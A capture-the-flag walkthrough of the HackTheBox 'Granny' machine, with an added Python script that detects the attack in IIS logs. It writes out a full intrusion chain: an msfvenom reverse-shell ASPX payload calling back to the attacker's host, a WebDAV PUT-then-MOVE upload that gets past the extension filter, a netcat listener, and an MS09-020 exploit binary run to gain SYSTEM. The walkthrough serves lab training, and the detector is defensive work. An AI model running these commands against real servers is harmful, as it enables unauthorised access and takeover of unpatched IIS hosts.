Cracking Granny, HackTheBox without Metasploit.

Recon

┌──(kali㉿kali)-[~/HackTheBox/Granny/recon]
└─$ nmap -sC -sV -p0-1000 10.10.10.15 > results.txt &
┌──(kali㉿kali)-[~/HackTheBox/Granny/recon]
└─$ cat results.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-20 08:01 EST
Nmap scan report for 10.10.10.15
Host is up (0.17s latency).
Not shown: 1000 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Date: Wed, 20 Jan 2021 15:24:03 GMT
| Server Type: Microsoft-IIS/6.0
|_ WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.03 seconds

Gaining Access

┌──(kali㉿kali)-[~/HackTheBox/Granny/recon]
└─$ davtest -url http://10.10.10.15 > test.txt &
┌──(kali㉿kali)-[~/HackTheBox/Granny/recon]
└─$ cat test.txt
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.15
********************************************************
NOTE Random string for this session: jPNif9zgQLl7qEs
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs
********************************************************
Sending test files
PUT cgi FAIL
PUT txt SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.txt
PUT cfm SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.cfm
PUT jsp SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.jsp
PUT shtml FAIL
PUT asp FAIL
PUT aspx FAIL
PUT pl SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.pl
PUT jhtml SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.jhtml
PUT php SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.php
PUT html SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.html
********************************************************
Checking for test file execution
EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.txt
EXEC cfm FAIL
EXEC jsp FAIL
EXEC pl FAIL
EXEC jhtml FAIL
EXEC php FAIL
EXEC html SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.html
********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs
PUT File: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.txt
PUT File: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.cfm
PUT File: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.jsp
PUT File: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.pl
PUT File: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.jhtml
PUT File: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.php
PUT File: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.html
Executes: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.txt
Executes: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.html
┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.23 LPORT=53 -f aspx -o foothold.aspx
┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit]
└─$ mv foothold.aspx foothold.txt
┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit]
└─$ curl -X PUT http://10.10.10.15/foothold.txt --data-binary @foothold.txt
┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit]
└─$ curl -X MOVE --header 'Destination:http://10.10.10.15/foothold.aspx' 'http://10.10.10.15/foothold.txt'
┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit]
└─$ curl http://10.10.10.15/foothold.aspx
┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit]
└─$ sudo nc -nvlp 53
[sudo] password for kali:
listening on [any] 53 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.15] 1039
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
c:\windows\system32\inetsrv>net user
net user
User accounts for \\GRANNY
-------------------------------------------------------------------------------
Administrator ASPNET Guest
IUSR_GRANPA IWAM_GRANPA Lakis
newuser pwn root
SUPPORT_388945a0 test
The command completed successfully.
c:\windows\system32\inetsrv>net user ASPNET
net user ASPNET
User name ASPNET
Full Name ASP.NET Machine Account
Comment Account used for running the ASP.NET worker process (aspnet_wp.exe)
User's comment Account used for running the ASP.NET worker process (aspnet_wp.exe)
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 4/12/2017 4:17 PM
Password expires Never
Password changeable 4/12/2017 4:17 PM
Password required No
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: GRANNY
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 1 Hours, 58 Minutes, 27 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 773 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,304 MB
Page File: In Use: 166 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/A

More Recon

┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit/Windows-Exploit-Suggester]
└─$ ./windows-exploit-suggester.py --database 2021-01-21-mssb.xls --systeminfo info.txt > suggestion.txt &
[1] 8468

[1] + done ./windows-exploit-suggester.py --database 2021-01-21-mssb.xls --systeminfo >
┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit/Windows-Exploit-Suggester]
└─$ cat suggestion.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits
[*] there are now 356 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2003 SP2 32-bit'
[*]
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*] https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*]
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
[*]
[E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[*] http://www.exploit-db.com/exploits/35936/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC
[*]
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*] http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*]
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*] https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*] http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*] http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*] http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*]
[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
[*] http://www.exploit-db.com/exploits/34112/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC
[*] http://www.exploit-db.com/exploits/34982/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
[*]
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[*] http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF
[*]
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*] https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*] https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*]
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*] http://www.exploit-db.com/exploits/34458/
[*]
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*] http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[*]
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) - Critical
[M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important
[M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important
[M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important
[M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical
[M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical
[M] MS08-078: Security Update for Internet Explorer (960714) - Critical
[*] done
┌──(kali㉿kali)-[~/GitRepos/windows-kernel-exploits/MS09-020/MS09-020-KB970483-CVE-2009-1535-IIS6]
└─$ ls
IIS6.0.exe
┌──(kali㉿kali)-[~/GitRepos/windows-kernel-exploits/MS09-020/MS09-020-KB970483-CVE-2009-1535-IIS6]
└─$ curl -X PUT http://10.10.10.15/exploit.txt --data-binary @IIS6.0.exe
┌──(kali㉿kali)-[~/GitRepos/windows-kernel-exploits/MS09-020/MS09-020-KB970483-CVE-2009-1535-IIS6]
└─$ curl -X MOVE --header 'Destination:http://10.10.10.15/exploit.exe' 'http://10.10.10.15/exploit.txt'
C:\>dir /S /P "exploit.exe"
dir /S /P "exploit.exe"
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Inetpub\wwwroot
01/21/2021 06:43 PM 211,716 exploit.exe
1 File(s) 211,716 bytes
Total Files Listed:
1 File(s) 211,716 bytes
0 Dir(s) 18,125,094,912 bytes free
C:\>cd Inetpub\wwwroot
cd Inetpub\wwwroot
C:\Inetpub\wwwroot>exploit.exe whoami
exploit.exe whoami
nt authority\system
-------------------------------------------
kindle-->Got WMI process Pid: 1396
begin to try
kindle-->Found token SYSTEM
kindle-->Command:whoami
C:\Inetpub\wwwroot>
C:\Inetpub\wwwroot>exploit.exe cmd.exe
exploit.exe cmd.exe
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Inetpub\wwwroot>whoami
whoami
-------------------------------------------
kindle-->Got WMI process Pid: 1396
begin to try
kindle-->Found token SYSTEM
kindle-->Command:cmd.exe
nt authority\system
C:\Inetpub\wwwroot>
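Both uploads above (foothold.txt renamed to foothold.aspx, exploit.txt renamed to exploit.exe) use the same trick: the davtest run showed that PUT of .asp/.aspx is refused, so the file is PUT with a harmless extension and then MOVEd to an executable one. As an added example that is not part of the original writeup, the script below looks for that PUT, MOVE, execute sequence in IIS W3C-style access logs; the log lines are constructed to mirror the writeup's requests, and the field layout (date time c-ip cs-method cs-uri-stem sc-status) is an assumption.

```python
# Added example, not from the writeup: flag the WebDAV PUT -> MOVE -> execute
# sequence in IIS W3C-style access logs. Log lines are constructed to mirror
# the writeup's requests; the assumed field layout is
# "date time c-ip cs-method cs-uri-stem sc-status" (Destination is not logged).
import os
from collections import defaultdict

# Extensions that IIS 6 would hand to a script engine or run natively.
SCRIPT_EXTS = {".asp", ".aspx", ".asa", ".cer", ".cdx", ".exe", ".dll"}

SAMPLE_LOG = """\
2021-01-21 18:40:01 10.10.14.23 OPTIONS / 200
2021-01-21 18:40:12 10.10.14.23 PUT /foothold.txt 201
2021-01-21 18:40:20 10.10.14.23 MOVE /foothold.txt 201
2021-01-21 18:40:31 10.10.14.23 GET /foothold.aspx 200
2021-01-21 18:41:02 10.10.14.23 PUT /exploit.txt 201
2021-01-21 18:41:10 10.10.14.23 MOVE /exploit.txt 201
2021-01-21 18:42:00 10.10.14.50 PUT /notes.txt 201
2021-01-21 18:42:05 10.10.14.50 GET /notes.txt 200
"""

def parse(line):
    date, time, ip, method, uri, status = line.split()
    return {"ip": ip, "method": method, "uri": uri, "status": int(status)}

def find_put_move_rename(log_text):
    """Return (severity, client_ip, uri) alerts: 'medium' when a client MOVEs a
    file it uploaded with PUT (the rename that sidesteps the PUT extension
    filter), 'high' when it then fetches a script-extension file of that basename."""
    uploaded = defaultdict(set)   # ip -> uris created with PUT
    moved = defaultdict(set)      # ip -> basenames (no extension) of MOVEd uploads
    alerts = []
    for line in log_text.splitlines():
        rec = parse(line)
        base, ext = os.path.splitext(rec["uri"])
        if rec["method"] == "PUT" and rec["status"] in (200, 201, 204):
            uploaded[rec["ip"]].add(rec["uri"])
        elif rec["method"] == "MOVE" and rec["uri"] in uploaded[rec["ip"]]:
            moved[rec["ip"]].add(base)
            alerts.append(("medium", rec["ip"], rec["uri"]))
        elif base in moved[rec["ip"]] and ext.lower() in SCRIPT_EXTS and rec["status"] == 200:
            alerts.append(("high", rec["ip"], rec["uri"]))
    return alerts

if __name__ == "__main__":
    for sev, ip, uri in find_put_move_rename(SAMPLE_LOG):
        print(f"[{sev}] {ip} {uri}")
```

Because the MOVE target is not in the default log fields, the MOVE of a freshly uploaded file is only a medium-confidence signal; the later 200 on a same-basename .aspx/.exe is what confirms the bypass, and the exploit.exe upload (never fetched over HTTP) stays at medium.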

Flags

C:\Documents and Settings>cd Lakis/Desktop
cd Lakis/Desktop
C:\Documents and Settings\Lakis\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings\Lakis\Desktop
04/12/2017 09:19 PM <DIR> .
04/12/2017 09:19 PM <DIR> ..
04/12/2017 09:20 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 18,125,111,296 bytes free
C:\Documents and Settings\Lakis\Desktop>type user.txt
C:\Documents and Settings>cd Administrator\Desktop
cd Administrator\Desktop
C:\Documents and Settings\Administrator\Desktop>type root.txt


Grad Student. Member Bi0s.
